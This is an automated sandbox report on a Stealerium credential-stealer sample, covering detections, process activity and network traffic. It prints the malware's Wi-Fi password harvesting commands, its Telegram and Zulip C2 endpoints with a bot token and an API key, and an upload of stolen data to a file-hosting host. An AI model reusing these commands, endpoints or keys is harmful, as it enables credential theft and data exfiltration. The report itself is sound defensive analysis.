Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K6aOw2Jmji.exe

Overview

General Information

Sample name:K6aOw2Jmji.exe
renamed because original name is a hash value
Original sample name:09f6e63d0518f1bebd5b74b8a4ba868d0843bc85922e85aefd94d20405e858d2.exe
Analysis ID:1565209
MD5:98a0c65bc0fe05d40971716ffd216519
SHA1:29725d1d174fb10d919a6f5b5f5ca2d2d83485af
SHA256:09f6e63d0518f1bebd5b74b8a4ba868d0843bc85922e85aefd94d20405e858d2
Tags:exevirustotal-vm-blacklistuser-JAMESWT_MHT
Infos:

Detection

Stealerium
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Stealerium
Yara detected Telegram RAT
Yara detected Telegram Recon
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Drops password protected ZIP file
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • K6aOw2Jmji.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\K6aOw2Jmji.exe" MD5: 98A0C65BC0FE05D40971716FFD216519)
    • cmd.exe (PID: 5596 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6696 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 3912 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 6968 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7248 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7296 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7312 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • WerFault.exe (PID: 7512 cmdline: C:\Windows\system32\WerFault.exe -u -p 6400 -s 3132 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • msiexec.exe (PID: 7056 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealeriumAccording to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actors addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium
{"C2 url": "https://api.telegram.org/bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7785245272, "is_bot": true, "first_name": "stealirum", "username": "stealirum_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}
{"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
SourceRuleDescriptionAuthorStrings
K6aOw2Jmji.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
    K6aOw2Jmji.exeJoeSecurity_StealeriumYara detected StealeriumJoe Security
      K6aOw2Jmji.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        K6aOw2Jmji.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          K6aOw2Jmji.exeINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
          • 0x386316:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
          SourceRuleDescriptionAuthorStrings
          C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH.zipJoeSecurity_StealeriumYara detected StealeriumJoe Security
            SourceRuleDescriptionAuthorStrings
            00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StealeriumYara detected StealeriumJoe Security
              00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StealeriumYara detected StealeriumJoe Security
                00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StealeriumYara detected StealeriumJoe Security
                  00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StealeriumYara detected StealeriumJoe Security
                    00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 13 entries
                      SourceRuleDescriptionAuthorStrings
                      0.0.K6aOw2Jmji.exe.267e6f40000.0.unpackJoeSecurity_StealeriumYara detected StealeriumJoe Security
                        0.0.K6aOw2Jmji.exe.267e6f40000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                          0.0.K6aOw2Jmji.exe.267e6f40000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                            0.0.K6aOw2Jmji.exe.267e6f40000.0.unpackINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
                            • 0x386316:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}

                            Stealing of Sensitive Information

                            barindex
                            Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\K6aOw2Jmji.exe", ParentImage: C:\Users\user\Desktop\K6aOw2Jmji.exe, ParentProcessId: 6400, ParentProcessName: K6aOw2Jmji.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 5596, ProcessName: cmd.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-29T12:28:35.552128+010028033053Unknown Traffic192.168.2.449738104.16.185.24180TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: K6aOw2Jmji.exeAvira: detected
                            Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Stealerium {"C2 url": "https://szurubooru.zulipchat.com/api/v1/messages", "User": "szurubooru@gmail.com", "API key": "fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS"}
                            Source: K6aOw2Jmji.exe.6400.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/sendMessage", "Telegram Stream": [{"ok": true, "result": {"id": 7785245272, "is_bot": true, "first_name": "stealirum", "username": "stealirum_bot", "can_join_groups": true, "can_read_all_group_messages": false, "supports_inline_queries": false, "can_connect_to_business": false, "has_main_web_app": false}}]}
                            Source: K6aOw2Jmji.exeReversingLabs: Detection: 68%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                            Source: K6aOw2Jmji.exeJoe Sandbox ML: detected
                            Source: K6aOw2Jmji.exeString decryptor: 7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE
                            Source: K6aOw2Jmji.exeString decryptor: 1177295272
                            Source: K6aOw2Jmji.exeString decryptor: https://api.telegram.org/bot
                            Source: K6aOw2Jmji.exeString decryptor: https://szurubooru.zulipchat.com/api/v1/messages
                            Source: K6aOw2Jmji.exeString decryptor: szurubooru@gmail.com
                            Source: K6aOw2Jmji.exeString decryptor: fgwT5umbrQdW6Y1buIWZJK6S2FVQZAeS
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49735 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49734 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49736 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49739 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 31.14.70.244:443 -> 192.168.2.4:49740 version: TLS 1.2
                            Source: K6aOw2Jmji.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2161581368.00000267E97D4000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: winload_prod.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.Data.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: ntkrnlmp.pdb\ source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.Windows.Forms.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.costura.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Drawing.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.pdbp source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: !costura.polly.core.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Drawing.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Numerics.pdbY9 source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.Numerics.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.ServiceProcess.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2161581368.00000267E97D4000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.ServiceProcess.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.polly.core.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Xml.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: K6aOw2Jmji.exe
                            Source: Binary string: System.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ServiceProcess.pdb* source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: ntkrnlmp.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: System.pdbh source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.wpf.ui.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressedl)=Eo source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Net.Http.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Configuration.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Data.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Data.ni.pdbRSDSC source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Xml.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Data.pdbH source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Windows.Forms.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: mscorlib.pdb source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9E50000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2161158898.00000267E9731000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2160038870.00000267E7549000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmp, WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: winload_prod.pdb\ source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780733000.00000004.00000800.00020000.00000000.sdmp, Temp.txt.0.dr
                            Source: Binary string: costura.polly.pdb.compressed source: K6aOw2Jmji.exe
                            Source: Binary string: System.Net.Http.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Drawing.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Management.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Runtime.Serialization.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: K6aOw2Jmji.exe
                            Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: K6aOw2Jmji.exe
                            Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: K6aOw2Jmji.exe
                            Source: Binary string: System.Numerics.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.ni.pdb source: WERD9EF.tmp.dmp.13.dr
                            Source: Binary string: System.Core.ni.pdbRSDS source: WERD9EF.tmp.dmp.13.dr

                            Networking

                            barindex
                            Source: Malware configuration extractorURLs: https://szurubooru.zulipchat.com/api/v1/messages
                            Source: unknownDNS query: name: api.telegram.org
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Host: api.gofile.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="807f9f0a-5cc3-4dc0-ad4d-1aa9765d148e"Host: store5.gofile.ioContent-Length: 118763Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                            Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                            Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
                            Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: icanhazip.com
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 104.16.185.241:80
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Host: api.gofile.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
                            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                            Source: global trafficDNS traffic detected: DNS query: 54.229.13.0.in-addr.arpa
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                            Source: global trafficDNS traffic detected: DNS query: api.gofile.io
                            Source: global trafficDNS traffic detected: DNS query: store5.gofile.io
                            Source: unknownHTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="807f9f0a-5cc3-4dc0-ad4d-1aa9765d148e"Host: store5.gofile.ioContent-Length: 118763Expect: 100-continueConnection: Keep-Alive
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.gofile.io
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2163306563.00000267E9DA8000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
